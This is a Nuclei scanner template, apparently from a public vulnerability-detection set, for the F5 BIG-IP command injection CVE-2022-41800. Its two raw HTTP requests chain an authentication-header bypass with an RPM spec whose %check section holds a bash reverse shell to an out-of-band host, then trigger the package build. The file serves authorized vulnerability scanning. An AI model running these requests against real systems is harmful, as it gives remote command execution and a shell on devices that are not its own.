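# Nuclei detection template for CVE-2022-41800 (F5 BIG-IP Appliance Mode
# command injection). The file had been collapsed onto two physical lines,
# which breaks the `|` block scalars and nested mappings; this restores the
# conventional two-space block layout, fixes the misspelled `intrusive` tag
# and a grammar slip in `impact`. No request, matcher or variable changed.
id: CVE-2022-41800

info:
  name: F5 BIG-IP Appliance Mode - Command Injection
  author: dwisiswant0
  severity: high
  description: |
    When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
  remediation: |
    Apply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced.
  impact: |
    A successful exploit can allow the attacker to execute remote commands on the server using authorization bypass (CVE-2022-1388).
  reference:
    - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
    - https://support.f5.com/csp/article/K97843387
    - https://support.f5.com/csp/article/K13325942
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://nvd.nist.gov/vuln/detail/cve-2022-41800
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 8.7
    cve-id: CVE-2022-41800
    cwe-id: CWE-77
    epss-score: 0.92678
    epss-percentile: 0.9976
    # NOTE(review): the CPE names only the APM product, while the advisory
    # references above describe BIG-IP generally — confirm against K97843387.
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    # Two raw requests below, so at most two requests per target.
    max-request: 2
    verified: true
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query:
      - http.title:"big-ip®-+redirect" +"server"
      - http.html:"big-ip apm"
    fofa-query:
      - body="big-ip apm"
      - title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  # `intrusive`: this check executes a command on the target (see `impact`),
  # so it is not a passive fingerprint — run only with authorization.
  tags: cve,cve2022,rce,f5,bigip,intrusive,vkev,vuln

variables:
  # Throw-away credentials: the requests rely on the CVE-2022-1388
  # authorization bypass named in `impact`, not on a valid password.
  auth: "admin:{{rand_text_alpha(1)}}"
  rand_app: "{{to_lower(rand_text_alpha(6))}}"
  rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
  rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"

http:
  - raw:
      # Request 1: create an RPM spec file whose %check section carries the
      # out-of-band callback to {{interactsh-url}}.
      - |
        POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "specFileData": {
            "name": "{{rand_app}}",
            "srcBasePath": "/tmp",
            "version": "{{rand_ver}}",
            "release": "{{rand_rel}}",
            "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
            "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
          }
        }

      # Request 2: trigger the package build using the spec path extracted
      # from the first response (`{{spec}}`).
      - |
        POST /mgmt/shared/iapp/build-package HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "state": {},
          "appName": "{{rand_app}}",
          "packageDirectory": "/tmp",
          "specFilePath": "{{spec}}",
          "force": true
        }

    extractors:
      # Internal-only: feeds `{{spec}}` into request 2, not reported as output.
      - type: json
        part: body
        name: spec
        json:
          - ".specFilePath"
        internal: true

    # Both conditions must hold: an OOB DNS interaction from the target AND
    # the build-task state in the response body. Either alone is not a finding.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "RUN_BUILD_RPM_TASK"
          - "shared:iapp:build-package:buildrpmtaskstate"

# NOTE(review): this digest is a signature over the template body; editing the
# body above presumably invalidates it, so re-sign with the project's
# template-signing tooling before publishing.
# digest: 4a0a0047304502204df56a459021f7bbfb857405754d2387bfa4162c5af9146916a11e101310f822022100d36c584ee3c8b19da09cd88adc98236598fc00dc2b8d467628fb394f9ad196ab:922c64590222798bb761d5b6d8e72950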